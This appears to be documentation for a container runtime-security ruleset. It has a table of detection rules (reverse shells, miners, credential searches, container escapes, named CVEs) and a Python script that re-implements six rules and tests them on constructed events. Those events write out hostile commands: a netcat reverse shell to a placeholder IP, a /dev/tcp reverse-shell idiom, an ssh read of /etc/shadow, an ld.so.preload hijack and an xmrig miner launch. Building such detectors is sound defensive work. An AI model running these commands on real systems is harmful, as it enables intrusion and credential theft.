The following table lists the rules you can add to a ruleset, including descriptions of the attack techniques the rules are designed to prevent, and a link to the MITRE ATT&CK site for more details.
| ID | Name | Details | Mitre link |
|----|------|---------|------------|
| 01 | Modify shell configuration file | Detects attempts to modify shell configuration files. | |
| 02 | Update package repository | Detects when package repositories are updated. | |
| 03 | Read SSH information | Detects any attempt to read files in SSH directories by non-SSH programs. | |
| 04 | Read sensitive file trusted after startup | Detects attempts by a trusted program to read a sensitive file after startup. Trusted programs may read these files at startup, but not afterwards. | |
| 05 | System user interactive | Detects attempts to run interactive commands as a system (non-login) user. | |
| 06 | Terminal shell in container | Detects when a shell command or script is used as the entrypoint or execution point into a container with an attached terminal. | |
| 07 | System procs network activity | Detects network activity by system binaries that are not expected to send or receive any network traffic. | |
| 08 | Contact EC2 Instance Metadata Service From Container | Detects attempts to contact the EC2 Instance Metadata Service from a container. | |
| 10 | Launch Package Management Process in Container | Detects when a package management process is run inside a container. | |
| 11 | Netcat Remote Code Execution in Container | Detects when Netcat is run inside a container in a mode that allows remote code execution. | |
| 12 | Clear Log Activities | Detects the modification or removal of critical log files. | |
| 13 | Create Symlink Over Sensitive Files | Detects when a symlink is created to a sensitive file. | |
| 14 | Packet socket created in container | Detects new packet sockets at the device driver level (OSI layer 2) in a container. Packet sockets can be used by an attacker for ARP spoofing and for privilege escalation (CVE-2020-14386). | |
| 15 | Redirect STDOUT/STDIN to Network Connection in Container | Detects when STDOUT/STDIN is redirected to a network connection in a container, which is a potential reverse shell. | N/A |
| 16 | Linux Kernel Module Injection Detected | Detects when a kernel module is injected from a container. | |
| 17 | Sudo Potential Privilege Escalation | Detects attempts to exploit the sudo privilege escalation vulnerability CVE-2021-3156, which affects sudo versions before 1.9.5p2. An unprivileged user can gain root by running sudoedit -s or sudoedit -i with a command-line argument that ends in a single backslash character. | |
| 18 | Launch Remote File Copy Tools in Container | Detects when remote file copy tools are launched in a container. | |
| 19 | Specific discover tool executed in container | Detects the execution of discovery and hacking tools inside a container. | |
| 20 | Amicontained download detected in container | Detects when the amicontained container-introspection tool is downloaded. | |
| 21 | Disable Security Tools | Detects attempts to disable specific security tools. | |
| 22 | Docker or kubernetes client executed in container | Detects when a docker or kubernetes client tool is executed inside a container. | |
| 23 | Escape attempt detected in privileged container | Detects the use of debugfs and mount operations in a privileged container, a common container escape technique. | |
| 24 | HugePages changed in container | Detects modification of HugePages settings, which XMRig changes as part of its mining setup. | |
| 25 | Detect crypto miners using the Stratum protocol | Detects crypto miners by their pool URI: miners typically specify the mining pool to connect to with a URI that begins with stratum+tcp or a variant. | |
| 26 | Schedule Cron Jobs | Detects when cron jobs are scheduled. | |
| 27 | Dynamic linker changed | Detects changes to the /etc/ld.so.preload file. | |
| 28 | DB program spawned process | Detects when a DB-related program spawns a new process other than itself. Can indicate a successful SQL injection. | |
| 29 | Lateral Movement using SSH | Detects SSH execution with the StrictHostKeyChecking and batch mode options set (typically StrictHostKeyChecking=no and BatchMode=yes). Can indicate a scripted lateral movement attempt. | |
| 30 | Detect miner termination in container | Detects miner termination in a container, which can indicate a miner terminating a competing miner. | |
| 31 | Launch Privileged Container | Detects the initial process started in a privileged container. | |
| 32 | Delete or rename shell history | Detects when a shell history file is deleted or renamed. | |
| 33 | File attributes changed in container | Detects attempts to change attributes on a file in a container. | |
| 34 | Set Setuid or Setgid bit | Detects when the setuid or setgid bit is set on an executable, which makes it run with the privileges of the owning user or group. | |
| 35 | Dangerous deletion detected in container | Detects when a file is deleted as part of indicator removal. | |
| 36 | Possible IRC communication in container | Detects communication on a known IRC port, such as TCP/6667, or TCP/6697 for TLS. | |
| 37 | BOtB download detected in container | Detects downloads of BOtB (Break out the Box), a container analysis and exploitation tool. | |
| 38 | Peirates tool detected in container | Detects downloads of Peirates, a Kubernetes penetration-testing tool. | |
| 39 | Interpreted procs inbound network activity | Detects any inbound network activity by an interpreted program, such as Perl, Python, or Ruby. | |
| 40 | Interpreted procs outbound network activity | Detects any outbound network activity by an interpreted program, such as Perl, Python, or Ruby. | |
| 41 | Search Private Keys or Passwords | Detects grep or find commands that search for private keys or passwords. | |
| 42 | Unexpected process termination in container | Detects attempts to look up specific processes and terminate them, which can indicate a newly deployed miner killing rival miners. | |
| 47 | Suspicious log manipulation | Detects targeted modification of critical log files. | |
| 48 | Switch Linux namespace | Detects unauthorized use of the setns syscall, which could lead to container escape. | |
| 49 | Launch Ingress Remote File Copy Tools in Container | Detects when ingress remote file copy tools are launched in a container. | |
| 50 | Execution from /dev/shm | Detects file execution from the /dev/shm directory, a common location for threat actors to stash their files. | |
| 51 | Find AWS Credentials | Detects find or grep commands that attempt to access AWS credentials. | |
| 52 | PTRACE attached to process | Detects attempts to inject code into a process using PTRACE. | |
| 53 | Create Hidden Files or Directories | Detects the creation of hidden files and directories. | |
| 54 | Mkdir binary dirs | Detects attempts to create a directory below a set of binary directories. | |
| 55 | Modify binary dirs | Detects attempts to modify any file below a set of binary directories. | |
| 56 | Polkit Local Privilege Escalation | Detects attempts to exploit the privilege escalation vulnerability in Polkit's pkexec (CVE-2021-4034). | |
| 57 | Write below rpm database | Detects attempts to write to the rpm database by any non-rpm related program. | |
| 58 | Increase Resource Limits via Prlimit Command in Container | Detects when the prlimit command is used to set or report process resource limits in a container. | |
| 59 | A Local User Added in Container | Detects the creation of a user account in a container. | |
| 60 | A Local User Deleted in Container | Detects the deletion of a user account in a container. | |
| 61 | Write to Selinux Config | Detects attempts to write content to the /etc/selinux/config file. | |
| 62 | Create Scheduled Task Using At | Detects when the at utility is used to schedule initial or recurring execution of code. | |
| 63 | Create Scheduled Task Using Systemd Timers | Detects when systemd timers are used to schedule initial or recurring execution of code. | |
| 64 | Write to System Control | Detects attempts to write content to the /etc/sysctl.conf file. | |
| 68 | Python urllib Import Command Execution | Detects when the import urllib or import urllib2 command is run in Python or Python 3. | N/A |
| 83 | File Executed from Memory | Detects when reflective code is loaded into a process to conceal the execution of a malicious payload. Reflective loading allocates and executes the payload directly in the memory of the process. | |
| 84 | Inject File to Process Memory Virtual Space | Detects when adversaries inject malicious code into a process through the /proc filesystem to evade process-based defenses and potentially elevate privileges. Proc memory injection executes arbitrary code in the address space of a separate live process. | |
| 89 | Suspicious Directory Change via ProcFD | Detects a process attempting to change its working directory through a proc-based file descriptor, a possible indicator of CVE-2024-21626. | N/A |
| 93 | Grep Search on Shell Configuration File | Detects attempts to search a shell configuration file with grep. | N/A |
| 96 | Vulnerable liblzma loaded into sshd | Detects when a vulnerable liblzma library (liblzma.so.5.6.0 or liblzma.so.5.6.1) is loaded into sshd. | N/A |
| 97 | Iptables Modification | Detects when the iptables configuration is modified by executing a command. | N/A |
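The table describes each detection in a single line. As an added example (editor's code, not the ruleset's own engine and not the product's rule syntax), the following Python script re-implements the logic behind rules 11, 15, 25, 27, 29 and 50 and runs it over constructed process events, so the conditions each rule needs (for example, rule 29 requiring both StrictHostKeyChecking and batch mode, not just one) are visible. The event schema (evt, proc, cmdline, container, exe, fd, target_fd) is an assumption made for this example, and the sample events are constructed, not captured from any real system.

```python
import re
import shlex
from dataclasses import dataclass


@dataclass
class Event:
    """One runtime event. The schema is an assumption made for this example."""
    evt: str             # "exec", "open_write" or "dup"
    proc: str            # process name (basename of the executable)
    cmdline: str         # full command line
    container: bool      # True when the process runs inside a container
    exe: str = ""        # absolute path of the executable (exec events)
    fd: str = ""         # file path or "socket:[inode]" (open_write / dup events)
    target_fd: int = -1  # destination descriptor of dup2()/dup3() (dup events)


SHELLS = {"sh", "bash", "dash", "zsh", "ash", "ksh"}
NETCAT = {"nc", "ncat", "netcat"}
# Stratum pool URIs: stratum+tcp://, stratum+ssl://, stratum2+tcp:// and so on.
STRATUM_RE = re.compile(r"\bstratum2?\+(?:tcp|tls|ssl|udp)://", re.IGNORECASE)


def argv(e):
    """Split the command line the way a shell would; fall back on whitespace."""
    try:
        return shlex.split(e.cmdline)
    except ValueError:
        return e.cmdline.split()


def rule_11_netcat_rce(e):
    # Rule 11: Netcat told to attach a program to the connection.
    return (e.evt == "exec" and e.container and e.proc in NETCAT
            and any(a in ("-e", "-c", "--exec", "--sh-exec") for a in argv(e)))


def rule_15_reverse_shell(e):
    # Rule 15: a shell duplicating a socket onto stdin/stdout/stderr,
    # which is what `bash -i >& /dev/tcp/host/port 0>&1` does.
    return (e.evt == "dup" and e.container and e.proc in SHELLS
            and e.fd.startswith("socket:") and e.target_fd in (0, 1, 2))


def rule_25_stratum(e):
    # Rule 25: a Stratum pool URI on the command line.
    return e.evt == "exec" and STRATUM_RE.search(e.cmdline) is not None


def rule_27_ld_preload(e):
    # Rule 27: any write to the dynamic linker preload file.
    return e.evt == "open_write" and e.fd == "/etc/ld.so.preload"


def rule_29_ssh_lateral(e):
    # Rule 29: collect -o options, written as "-o Key=val" or "-oKey=val".
    if e.evt != "exec" or e.proc != "ssh":
        return False
    opts, args = set(), argv(e)
    for i, a in enumerate(args):
        if a == "-o" and i + 1 < len(args):
            opts.add(args[i + 1].lower())
        elif a.startswith("-o") and len(a) > 2:
            opts.add(a[2:].lower())
    # Both are required: StrictHostKeyChecking=no alone is common in CI scripts.
    return "stricthostkeychecking=no" in opts and "batchmode=yes" in opts


def rule_50_dev_shm(e):
    # Rule 50: executable image lives under /dev/shm.
    return e.evt == "exec" and e.exe.startswith("/dev/shm/")


RULES = [
    ("11", "Netcat Remote Code Execution in Container", rule_11_netcat_rce),
    ("15", "Redirect STDOUT/STDIN to Network Connection in Container", rule_15_reverse_shell),
    ("25", "Detect crypto miners using the Stratum protocol", rule_25_stratum),
    ("27", "Dynamic linker changed", rule_27_ld_preload),
    ("29", "Lateral Movement using SSH", rule_29_ssh_lateral),
    ("50", "Execution from /dev/shm", rule_50_dev_shm),
]


def evaluate(events):
    """Return (event index, rule ID) for every rule that fires on each event."""
    return [(i, rid) for i, e in enumerate(events) for rid, _, check in RULES if check(e)]


# Constructed sample events (not captured from any real system).
SAMPLE_EVENTS = [
    Event("exec", "xmrig", "xmrig -o stratum+tcp://pool.example.invalid:3333 -u wallet", True, exe="/tmp/xmrig"),
    Event("exec", "ssh", "ssh -o StrictHostKeyChecking=no -oBatchMode=yes -i /tmp/k app@10.0.0.7 'cat /etc/shadow'", False),
    Event("open_write", "bash", "bash -c 'echo /tmp/evil.so > /etc/ld.so.preload'", False, fd="/etc/ld.so.preload"),
    Event("exec", "payload", "/dev/shm/.x/payload", True, exe="/dev/shm/.x/payload"),
    Event("dup", "bash", "bash -i", True, fd="socket:[48213]", target_fd=1),
    Event("exec", "nc", "nc -e /bin/sh 203.0.113.5 4444", True),
    # Benign: no BatchMode, so rule 29 must stay quiet.
    Event("exec", "ssh", "ssh -o StrictHostKeyChecking=no git@git.example.invalid", False),
]

if __name__ == "__main__":
    names = {rid: name for rid, name, _ in RULES}
    for i, rid in evaluate(SAMPLE_EVENTS):
        print(f"event {i}: rule {rid} ({names[rid]}): {SAMPLE_EVENTS[i].cmdline}")
```

Running the script fires exactly one rule per malicious sample event and none for the benign SSH invocation. A production engine sees these conditions as syscall arguments (the dup2 target, the opened path, the exec image) rather than a parsed command line, which is why rule 15 and rule 50 are modelled on fd and exe fields rather than on cmdline text.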